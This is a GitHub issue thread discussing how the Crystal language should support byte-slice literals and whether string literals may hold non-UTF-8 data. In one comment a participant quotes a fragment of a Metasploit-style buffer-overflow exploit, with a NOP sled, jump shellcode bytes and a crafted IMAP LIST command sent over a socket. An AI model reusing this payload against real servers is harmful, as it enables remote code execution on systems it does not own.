-
-
Notifications
You must be signed in to change notification settings - Fork 1.6k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Literals for Slice(UInt8) #2886
Comments
I would tend towards 2 with something like #2791 (comment) as the preferred alternative. Either way we need to make sure to not run into issues similar to #2485. |
Same here:
But I like that. |
One issue we found the other day is that we needed to do a POST in the http client with binary data. We made it work by simply creating a String with that data and then invoking To compare with other statically typed languaged, Go's strings are also just byte chunks that can hold arbitrary bytes, but can also be treated as UTF-8 strings when needed: https://blog.golang.org/strings Java's String class is supposed to be UTF-16, but can hold arbitrary bytes as well. |
I very much like that String is supposed to handle UTF-8 valid data and operations on that. And nothing else. I would hate to loose that property and rather prefer convenience API added to other interfaces for handling |
I am with @jhass here. I would keep String as valid UTF-8. I would rather add overloads in the http client to send/receive blobs. |
Would it be helpful or more performant to have |
@mperham Good idea, an overload that writes directly to an IO is missing. Should be easy to add. |
Just a side note, I'm trying to write the Slice(UInt8) out to the Kemal response: def self.serve(filename, resp)
resp.status_code = 200
resp.write Base64.decode(WEB_ASSETS[filename])
end I verified that the Slice size is exactly the same size as the file on disk but the response only has about half the expected bytes. Anyone know why the server response is not writing the entire Slice to the client? |
@mperham we'd probably need a concrete code that we can reproduce to check if something works wrong. I tried creating a slice of 5000~50000 bytes and it works well. |
Looks like the problem is related to me not setting the content-type header. The browser prints out the PNG contents as text/html but serves it correctly when I set it to "application/octet-stream". |
Just throwing thoughts in to the mixture here: How about a literal that generates a View(UInt8) which would be a read only type derived from Slice(UInt8)? If it's known at compile time an area is unwritable, we should be helped at compile time, avoiding a crash where possible. |
How about provide users to create their own literal types (maybe in Then we can create some custom literals for |
Any progress on this? |
@maxpowa io = IO::Memory.new
io.write UInt8.slice(1, 1, 1, 1, 1, 1, 1, 1)
io.rewind
io.write_bytes(0x00000000, IO::ByteFormat::BigEndian)
io.to_slice # Bytes[0, 0, 0, 0, 1, 1, 1, 1] |
Yep nevermind, it is indeed working... I must have done something wrong when I was testing. Thanks @exilor |
This has been implemented in cd8296b, by the way. I think it's a really bad idea to allow broken string literals in the language's core syntax. I noticed that some people are already doing hideous things with it, without really understanding the situation... The alternative solution is the way to go. And Side note: in Python |
@oprypin but sometimes people need to do hideous things for hideous causes :) def exploit
connected = connect_login
nopes = "\x90"*(payload_space-payload.encoded.length) # to be fixed with make_nops()
sjump = "\xEB\xF9\x90\x90" # Jmp Back
njump = "\xE9\xDD\xD7\xFF\xFF" # And Back Again Baby ;)
evil = nopes + payload.encoded + njump + sjump + [target.ret].pack("A3")
print_status("Sending payload")
sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
sock.put(sploit)
handler
disconnect
end etc.... |
It's still easy enough to construct a string with invalid data, I just don't think it should be part of the syntax. |
@bararchy, thanks for a good demonstration of the point I was making... All of these should have been |
I forgot that this issue existed and just started writing a new one. So, ping Putting bytes literals in read-only data is a must-have, and so if the literal produces a writable |
Right now this is solved because one can use a String for this, because a String can now have arbitrary bytes. I know it's not the most elegant solution, but for now it works. We can postpone a real solution for this for later. |
pls |
What if we add: b"some content" For now that would be equivalent to: "some content".to_slice and of course you can use We could also have: b'x' to be the same as I think Rust uses the same notation. |
My suggestion that I started to write: It would be a literal that does not allow I propose the syntax Side note, I would also suggest removing the hexadecimal notation from strings. Obviously, to replace the use case, the bytes literal would need to store the data in the read-only data section. I don't know whether that means that the size of the slice would need to be moved there as well, like it is with strings.
|
Oh, with For that we'll probably need But for now I'd leave the ability to have |
I don't think it's that important to prevent strings that are not valid UTF-8. The only way to create them is |
@asterite We wouldn't need to know about |
@RX14, are you sure you understand the part about putting this in read-only data section? |
@oprypin yes.... you pass a pointer to the data in the RO section to the slice contructor. The slice instance itself has to live on the stack anyway, so can't be in ROdata. |
@RX14 Please reopen this |
Why was this even closed and all those other issues which are most definitely not fixed? |
I would go one step further and use a completely new syntax similar to Elixir's bitstrings, rather than simply borrowing the one for string literals: <<0x12>> # => <<0x12>>
<<0x21>> # => "!"
<<0xCF, 0x83>> # => "σ"
"\xCF\x83" # => "σ"
<<0x12, 0xCF, 0x83>> # => <<0x12, 0xCF, 0x83>>
"\x12\xCF\x83" # => <<0x12, 0xCF, 0x83>>
<<0x12, "σ">> # => <<0x12, 0xCF, 0x83>> (Every double-quoted string literal in Elixir denotes a bitstring. Single-quoted ones produce charlists.) An attractive feature about them is they can handle multibyte sequences: <<0x12345678::32>> # => <<18, 52, 86, 120>>
<<0x12345678::32-little>> # => <<18, 52, 86, 120>>
<<1.0::little>> # => <<0, 0, 0, 0, 0, 0, 240, 63>>
<<1.0::32-little>> # => <<0, 0, 128, 63>>
<<0xCF83::16>> # => "σ"
<<0x83CF::16-little>> # => "σ"
<<"σ"::utf8>> # => "σ"
<<"σ"::utf16-little>> # => <<195, 3>>
<<0x03C3::utf8>> # => "σ"
<<0x03C3::utf16-big>> # => <<3, 195>> It emphasizes the fact that byte arrays are a more general concept than string-like byte sequences. It is important that both the If we have an extremely fast |
Just to throw yet another an idea in: Ruby also has ?\C-g == ?\a # => true Then again, b( "filemagic", 0x01, 0x02, '\a', '\C-g' ) |
We need a way to express binary data embedded in the data section of the program. We can do this right now for strings, but there's no way to create a non-UTF8 string with a string literal.
There are several ways we can fix this:
\x...
escape to string literals, to add a byte with a specific hexadecimal value. Right now strings can hold non-UTF8 data, they just raise when using those strings as UTF-8 data (for example, iterating them), so it's strange that they can hold non-UTF8 data but one can't create them with a literal. From there, one could take a slice. This will also solve Remove macro methods from the language #2565 because inspecting a string with non-valid codepoints will output\x...
for those values.Slice(UInt8)
. It could just beSlice(UInt8)
, but these are not read-only. Or maybe they can be read-only and they can crash the program when written. One shouldn't write them, the same way as one doesn't get a slice from a string literal and writes to it. There was the idea of introducingconst [...]
for this, with which we could create static data for any kind of integer value.This doesn't have a big priority right now, but I'm leaving it here so there's a place to discuss this.
The text was updated successfully, but these errors were encountered: